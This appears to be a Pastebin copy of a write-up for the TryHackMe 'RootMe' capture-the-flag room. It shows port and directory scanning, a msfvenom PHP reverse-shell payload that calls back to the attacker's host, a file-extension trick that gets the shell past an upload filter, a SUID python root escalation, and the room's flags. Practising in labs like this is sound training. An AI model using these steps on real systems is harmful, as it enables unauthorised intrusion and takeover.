API tools faq
paste
Advertisement
MrA7

TryHackMe CTF: RootMe

MrA7
Apr 23rd, 2023
61
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.36 KB | Cybersecurity | 0 0
raw download clone embed print report
  1.  
  2. IP: **10.10.187.43**
  3.  
  4.  
  5. ## Reconnaissance
  6. #### nmap
  7. ```
  8. [kali:~]$ sudo nmap -p- 10.10.187.43
  9. [sudo] password for kali:
  10. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:09 EST
  11. Nmap scan report for 10.10.187.43
  12. Host is up (0.049s latency).
  13. Not shown: 65533 closed tcp ports (reset)
  14. PORT STATE SERVICE
  15. 22/tcp open ssh
  16. 80/tcp open http
  17.  
  18. Nmap done: 1 IP address (1 host up) scanned in 87.43 seconds
  19. [kali:~]$ sudo nmap -sC -sV -p22,80 10.10.187.43
  20. Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-07 10:11 EST
  21. Nmap scan report for 10.10.187.43
  22. Host is up (0.043s latency).
  23.  
  24. PORT STATE SERVICE VERSION
  25. 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  26. | ssh-hostkey:
  27. | 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
  28. | 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
  29. |_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
  30. 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
  31. | http-cookie-flags:
  32. | /:
  33. | PHPSESSID:
  34. |_ httponly flag not set
  35. |_http-title: HackIT - Home
  36. |_http-server-header: Apache/2.4.29 (Ubuntu)
  37. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  38.  
  39. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  40. Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
  41. [kali:~]$
  42. ```
  43. - Found a webserver
  44. #### Gobuster
  45. ```
  46. [kali:~]$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.187.43/
  47. ===============================================================
  48. Gobuster v3.1.0
  49. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  50. ===============================================================
  51. [+] Url: http://10.10.187.43/
  52. [+] Method: GET
  53. [+] Threads: 10
  54. [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  55. [+] Negative Status codes: 404
  56. [+] User Agent: gobuster/3.1.0
  57. [+] Timeout: 10s
  58. ===============================================================
  59. 2023/03/07 10:16:01 Starting gobuster in directory enumeration mode
  60. ===============================================================
  61. /uploads (Status: 301) [Size: 314] [--> http://10.10.187.43/uploads/]
  62. /css (Status: 301) [Size: 310] [--> http://10.10.187.43/css/]
  63. /js (Status: 301) [Size: 309] [--> http://10.10.187.43/js/]
  64. /panel (Status: 301) [Size: 312] [--> http://10.10.187.43/panel/]
  65. Progress: 7383 / 220561 (3.35%) ^C
  66. [!] Keyboard interrupt detected, terminating.
  67.  
  68. ===============================================================
  69. 2023/03/07 10:16:35 Finished
  70. ===============================================================
  71. ```
  72. - Found the file `panel` containing an upload point with `upload` folder exposed
  73.  
  74. ## Exploiting
  75. #### Msfvenom
  76. ```
  77. [kali:~]$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.14.36.168 LPORT=4444 -f raw > shell.php
  78. To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
  79. [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
  80. [-] No arch selected, selecting arch: php from the payload
  81. No encoder specified, outputting raw payload
  82. Payload size: 34789 bytes
  83. ```
  84. - Created a php shell since the webserver is using php
  85. - Changed the extension to `.php5` to evade the detection
  86. - Sometimes the application accepts the file but not execute it
  87. - Upload it and got a reverse shell with `www-data` user
  88.  
  89.  
  90. ## Priv Esc
  91. - Looking for SUID files permission: `find / -user root -perm /4000`
  92. - Got a bunch, but the interesting one is `/usr/bin/python`
  93. - Went to https://gtfobins.github.io/ and looked for python > SUID
  94. - Found this `./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'`
  95. - Executed it
  96. ```
  97. python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
  98. ls
  99. shell.php3
  100. shell1.php3
  101. shellfinal
  102. shellfinal.PHTML
  103. shellfinal.php%00.txt
  104. shellfinal.php5
  105. shelly.elf
  106. shellyy.php3
  107. shellyy.sh
  108. webshell.php3
  109. whoami
  110. root
  111. cd /root
  112. ls
  113. root.txt
  114. cat root.txt
  115. THM{pr1v1l3g3_3sc4l4t10n}
  116. ```
  117.  
  118. ## Flags
  119. - User: `THM{y0u_g0t_a_sh3ll}`
  120. - Root: `THM{pr1v1l3g3_3sc4l4t10n}`
  121.  
  122. This paste owned by https://linktr.ee/a7.acc
Tags: Hack CTF tryhackme
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!